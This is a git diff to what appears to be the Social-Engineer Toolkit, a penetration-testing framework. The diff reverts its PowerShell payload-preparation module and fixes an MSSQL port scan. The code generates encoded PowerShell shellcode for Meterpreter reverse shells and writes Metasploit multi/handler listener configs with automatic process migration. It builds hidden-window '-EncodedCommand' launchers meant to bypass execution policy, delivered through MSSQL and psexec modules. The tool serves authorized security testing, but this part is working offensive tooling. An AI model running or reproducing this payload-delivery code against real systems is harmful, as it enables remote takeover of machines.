diff --git a/readme/CHANGELOG b/readme/CHANGELOG index 71f4f0d81..abf02b894 100644 --- a/readme/CHANGELOG +++ b/readme/CHANGELOG @@ -1,3 +1,10 @@ +~~~~~~~~~~~~~~~~ +version 7.3.7 +~~~~~~~~~~~~~~~~ + +* replaced powershell prep with the old one - it broke almost all powershell injection in SET +* fixed an issue that would cause scanner to continue to scan even when port not discovered (function issue) + ~~~~~~~~~~~~~~~~ version 7.3.6 ~~~~~~~~~~~~~~~~ diff --git a/src/core/fasttrack.py b/src/core/fasttrack.py index aa19ce110..dab272004 100644 --- a/src/core/fasttrack.py +++ b/src/core/fasttrack.py @@ -113,8 +113,8 @@ try: for ip in range1: sqlport = get_sql_port(ip) if sqlport == None: - sql_nmap_scan(ip) - if sql_nmap_scan != "": + nmapscan = sql_nmap_scan(ip) + if nmapscan != "": sql_servers = sql_servers + \ ip + ":" + "1433" + "," diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index 854c00654..74e5a7a63 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -10,7 +10,6 @@ import base64 from src.core.setcore import * from src.core.menu.text import * from src.core.dictionaries import * -from src.payloads.powershell.prep import prep_powershell_payload try: if len(check_options("IPADDR=")) > 2: @@ -600,7 +599,10 @@ try: if setshell_counter == 0: if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if os.path.isfile("%s/web_clone/index.html" % (setdir)): - prep_powershell_payload() + try: + core.module_reload(src.payloads.powershell.prep) + except: + import src.payloads.powershell.prep if os.path.isfile("%s/x86.powershell" % (setdir)): fileopen1 = open( "%s/x86.powershell" % (setdir), "r") diff --git a/src/core/set.version b/src/core/set.version index ee11304de..704726ec8 100644 --- a/src/core/set.version +++ b/src/core/set.version @@ -1 +1 @@ -7.3.6 +7.3.7 diff --git a/src/core/setcore.py b/src/core/setcore.py index be1c0a750..4c04d9470 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -1762,7 +1762,7 @@ def get_sql_port(host): # Build the socket with a .1 second timeout s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.settimeout(.1) + s.settimeout(.3) # Attempt to query UDP:1434 and return MSSQL running port try: diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index 311bd8cbb..b306a2262 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -8,7 +8,6 @@ import subprocess import time import src.core.setcore as core import impacket.tds as tds -from src.payloads.powershell.prep import prep_powershell_payload #from src.core.payloadgen import create_payloads @@ -173,7 +172,8 @@ def deploy_hex2binary(ipaddr, port, username, password): if choice1 == "1": web_path = None - prep_powershell_payload() + + #prep_powershell_payload() # if we are using a SET interactive shell payload then we need to make # the path under web_clone versus ~./set @@ -245,20 +245,20 @@ def deploy_hex2binary(ipaddr, port, username, password): filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.close() - #try: - # core.module_reload(src.payloads.powershell.prep) - #except: - # import src.payloads.powershell.prep + try: + core.module_reload(src.payloads.powershell.prep) + except: + import src.payloads.powershell.prep # launch powershell - prep_powershell_payload() + #prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): os.makedirs(os.path.join(core.setdir + "reports/powershell")) #with open(os.path.join(core.setdir + "x86.powershell")) as x86: - x86 = file(core.setdir + "x86.powershell").read() + x86 = file(core.setdir + "x86.powershell").read().rstrip() # x86 = x86.read() x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index ca864853d..b63c80112 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -8,7 +8,6 @@ import os import subprocess import src.core.setcore as core -from src.payloads.powershell.prep import prep_powershell_payload # Py2/3 compatibility # Python3 renamed raw_input to input @@ -75,7 +74,12 @@ try: core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - prep_powershell_payload() + #prep_powershell_payload() + + try: + core.module_reload(src.payloads.powershell.prep) + except: + import src.payloads.powershell.prep # create the directory if it does not exist if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")): diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py index 856af29ca..1a3483680 100644 --- a/src/payloads/powershell/prep.py +++ b/src/payloads/powershell/prep.py @@ -1,201 +1,203 @@ #!/usr/bin/env python -# coding=utf-8 -import os +import sys +import subprocess import re +import os import time +from src.core.setcore import * -import src.core.setcore as core +# grab stage encoding flag +stage_encoding = check_config("STAGE_ENCODING=").lower() +if stage_encoding == "off": + stage_encoding = "false" +else: + stage_encoding = "true" -# Py2/3 compatibility -# Python3 renamed raw_input to input -try: - input = raw_input -except NameError: - pass +# check to see if we are just generating powershell code +powershell_solo = check_options("POWERSHELL_SOLO") -def prep_powershell_payload(): +# check if port is there +port = check_options("PORT=") - # grab stage encoding flag - stage_encoding = core.check_config("STAGE_ENCODING=").lower() - if stage_encoding == "off": - stage_encoding = "false" +# check if we are using auto_migrate +auto_migrate = check_config("AUTO_MIGRATE=") + +# check if we are using pyinjection +pyinjection = check_options("PYINJECTION=") +if pyinjection == "ON": + # check to ensure that the payload options were specified right + if os.path.isfile(setdir + "/payload_options.shellcode"): + pyinjection = "on" + print_status( + "Multi/Pyinjection was specified. Overriding config options.") else: - stage_encoding = "true" + pyinjection = "off" - # check to see if we are just generating powershell code - powershell_solo = core.check_options("POWERSHELL_SOLO") +# grab ipaddress +if check_options("IPADDR=") != 0: + ipaddr = check_options("IPADDR=") +else: + ipaddr = input("Enter the ipaddress for the reverse connection: ") + update_options("IPADDR=" + ipaddr) - # check if port is there - port = core.check_options("PORT=") +# check to see if we are using multi powershell injection +multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower() - # check if we are using auto_migrate - auto_migrate = core.check_config("AUTO_MIGRATE=") +# turn off multi injection if pyinjection is specified +if pyinjection == "on": + multi_injection = "off" - # check if we are using pyinjection - pyinjection = core.check_options("PYINJECTION=") - if pyinjection == "ON": - # check to ensure that the payload options were specified right - if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")): - pyinjection = "on" - core.print_status("Multi/Pyinjection was specified. Overriding config options.") - else: - pyinjection = "off" +# check what payloads we are using +powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=") - # grab ipaddress - if core.check_options("IPADDR=") != 0: - ipaddr = core.check_options("IPADDR=") - else: - ipaddr = input("Enter the ipaddress for the reverse connection: ") - core.update_options("IPADDR=" + ipaddr) +# if we specified a hostname then default to reverse https/http +if validate_ip(ipaddr) == False: + powershell_inject_x86 = "windows/meterpreter/reverse_http" - # check to see if we are using multi powershell injection - multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower() - - # turn off multi injection if pyinjection is specified - if pyinjection == "on": - multi_injection = "off" - - # check what payloads we are using - powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=") - - # if we specified a hostname then default to reverse https/http - if not core.validate_ip(ipaddr): - powershell_inject_x86 = "windows/meterpreter/reverse_http" - - # prompt what port to listen on for powershell then make an append to the current - # metasploit answer file - if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - # if we have multi injection on, don't worry about these - if multi_injection != "on" and pyinjection == "off": - core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector") - port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if not port: +# prompt what port to listen on for powershell then make an append to the current +# metasploit answer file +if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + # if we have multi injection on, don't worry about these + if multi_injection != "on": + if pyinjection == "off": + print_status( + "POWERSHELL_INJECTION is set to ON with multi-pyinjector") + port = input(setprompt( + ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) + if port == "": port = "443" - with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen: - data = fileopen.read() + fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r") + data = fileopen.read() match = re.search(port, data) if not match: - with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD {0}\n" - "set LHOST {1}\n" - "set LPORT {2}\n" - "set EnableStageEncoding {3}\n" - "set ExitOnSession false\n" - "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding)) + filewrite = open( + "%s/meta_config_multipyinjector" % (setdir), "a") + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write( + "set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit -j\n" % + (powershell_inject_x86, ipaddr, port, stage_encoding)) + filewrite.close() - # if we have multi injection on, don't worry about these - if multi_injection != "on" and pyinjection == "off": +# if we have multi injection on, don't worry about these +if multi_injection != "on": + if pyinjection == "off": # check to see if the meta config multi pyinjector is there - if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - if core.check_options("PORT=") != 0: - port = core.check_options("PORT=") + if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if check_options("PORT=") != 0: + port = check_options("PORT=") # if port.options isnt there then prompt else: - port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]")) - if not port: + port = input(setprompt( + ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) + if port == "": port = "443" - core.update_options("PORT={0}".format(port)) + update_options("PORT=" + port) - # turn off multi_injection if we are riding solo from the powershell menu - if powershell_solo == "ON": - multi_injection = "off" - pyinjection = "on" +# turn off multi_injection if we are riding solo from the powershell menu +if powershell_solo == "ON": + multi_injection = "off" + pyinjection = "on" - # if we are using multi powershell injection - if multi_injection == "on" and pyinjection == "off": - core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...") +# if we are using multi powershell injection +if multi_injection == "on": + if pyinjection == "off": + print_status( + "Multi-Powershell-Injection is set to ON, this should be sweet...") - # define a base variable - x86 = "" +# define a base variable +x86 = "" - # specify a list we will use for later +# specify a list we will use for later +multi_injection_x86 = "" + +# here we do some funky loops so we don't need to rewrite the code below +if multi_injection == "on": + port = check_config("POWERSHELL_MULTI_PORTS=") + port = port.split(",") + +if multi_injection == "on": + # iterate through the ports, used for POWERSHELL_MULTI_PORTS + for ports in port: + # dont cycle through if theres a blank + if ports != "": + print_status( + "Generating x86-based powershell injection code for port: %s" % (ports)) + multi_injection_x86 = multi_injection_x86 + "," + \ + generate_powershell_alphanumeric_payload( + powershell_inject_x86, ipaddr, ports, x86) + + if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + port_check = check_ports( + "%s/meta_config_multipyinjector" % (setdir), ports) + if port_check == False: + filewrite = open( + "%s/meta_config_multipyinjector" % (setdir), "a") + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write( + "set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % ( + powershell_inject_x86, ipaddr, stage_encoding, ports)) + filewrite.close() + + # if we aren't using multi pyinjector + if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + # if meta config isn't created yet then create it + if not os.path.isfile("%s/meta_config" % (setdir)): + filewrite = open("%s/meta_config" % (setdir), "w") + filewrite.write("") + filewrite.close() + port_check = check_ports("%s/meta_config" % (setdir), ports) + if port_check == False: + filewrite = open("%s/meta_config" % (setdir), "a") + filewrite.write("\nuse exploit/multi/handler\n") + if auto_migrate == "ON": + filewrite.write( + "set AutoRunScript post/windows/manage/smart_migrate\n") + filewrite.write("set PAYLOAD %s\nset LHOST %s\nset EnableStageEncoding %s\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % ( + powershell_inject_x86, ipaddr, stage_encoding, ports)) + filewrite.close() + +# here we do everything if pyinjection or multi pyinjection was specified +if pyinjection == "on": multi_injection_x86 = "" - - # here we do some funky loops so we don't need to rewrite the code below - if multi_injection == "on": - port = core.check_config("POWERSHELL_MULTI_PORTS=") - port = port.split(",") - - if multi_injection == "on": - # iterate through the ports, used for POWERSHELL_MULTI_PORTS - for ports in port: - # dont cycle through if theres a blank - if ports: - core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports)) - multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86) - - if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports) - if not port_check: - with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite: - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD {0}\n" - "set LHOST {1}\n" - "set EnableStageEncoding {2}\n" - "set LPORT {3}\n" - "set ExitOnSession false\n" - "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) - - # if we aren't using multi pyinjector - if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")): - # if meta config isn't created yet then create it - if not os.path.isfile(): - with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite: - filewrite.write("") - port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports) - if not port_check: - with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite: - filewrite.write("\nuse exploit/multi/handler\n") - if auto_migrate == "ON": - filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n") - filewrite.write("set PAYLOAD {0}\n" - "set LHOST {1}\n" - "set EnableStageEncoding {2}\n" - "set ExitOnSession false\n" - "set LPORT {3}\n" - "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports)) - - # here we do everything if pyinjection or multi pyinjection was specified - if pyinjection == "on": - injections = [] - # read in the file we need for parsing - with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen: - payloads = fileopen.read()[:-1].rstrip() # strips an extra , - payloads = payloads.split(",") + # read in the file we need for parsing + fileopen = open(setdir + "/payload_options.shellcode", "r") + payloads = fileopen.read()[:-1].rstrip() # strips an extra , + payloads = payloads.split(",") + # format: payloadport + for payload in payloads: # format: payloadport - for payload in payloads: - # format: payloadport - payload = payload.split(" ") - powershell_inject_x86 = payload[0] - port = payload[1] - core.print_status("Generating x86-based powershell injection code...") - injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)) - multi_injection_x86 = ",".join(injections) + payload = payload.split(" ") + powershell_inject_x86 = payload[0] + port = payload[1] + print_status("Generating x86-based powershell injection code...") + multi_injection_x86 = multi_injection_x86 + "," + \ + generate_powershell_alphanumeric_payload( + powershell_inject_x86, ipaddr, port, x86) - # if its turned to off - if multi_injection == "off" and pyinjection == "off": - core.print_status("Generating x86-based powershell injection code...") - x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) +# if its turned to off +if multi_injection == "off": + if pyinjection == "off": + print_status("Generating x86-based powershell injection code...") + x86 = generate_powershell_alphanumeric_payload( + powershell_inject_x86, ipaddr, port, x86) - # if we are specifying multi powershell injection - if multi_injection == "on" or pyinjection == "on": - x86 = multi_injection_x86[1:] # remove comma at beginning +# if we are specifying multi powershell injection +if multi_injection == "on" or pyinjection == "on": + x86 = multi_injection_x86[1:] # remove comma at beginning - # check to see if we want to display the powershell command to the user - verbose = core.check_config("POWERSHELL_VERBOSE=") - if verbose.lower() == "on": - core.print_status("Printing the x86 based encoded code...") - time.sleep(3) - print(x86) +# check to see if we want to display the powershell command to the user +verbose = check_config("POWERSHELL_VERBOSE=") +if verbose.lower() == "on": + print_status("Printing the x86 based encoded code...") + time.sleep(3) + print(x86) - #with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite: - filewrite = open(core.setdir + "/x86.powershell", "w") - filewrite.write(x86) - filewrite.close() - core.print_status("Finished generating powershell injection bypass.") - core.print_status("Encoded to bypass execution restriction policy...") +filewrite = open("%s/x86.powershell" % (setdir), "w") +filewrite.write(x86) +filewrite.close() +print_status("Finished generating powershell injection bypass.") +print_status("Encoded to bypass execution restriction policy...") diff --git a/src/powershell/powershell.py b/src/powershell/powershell.py index 058b3fb95..ccabb06be 100644 --- a/src/powershell/powershell.py +++ b/src/powershell/powershell.py @@ -12,7 +12,6 @@ import subprocess import src.core.setcore as core from src.core.menu import text -from src.payloads.powershell.prep import prep_powershell_payload # Py2/3 compatibility # Python3 renamed raw_input to input @@ -43,7 +42,12 @@ if powershell_menu_choice != "99": with open(core.setdir + "/payload_options.shellcode", "w") as filewrite: filewrite.write("windows/meterpreter/reverse_tcp {},".format(port)) - prep_powershell_payload() + try: + core.module_reload(src.payloads.powershell.prep) + except: + import src.payloads.powershell.prep + + #prep_powershell_payload() # create the directory if it does not exist if not os.path.isdir(core.setdir + "/reports/powershell"):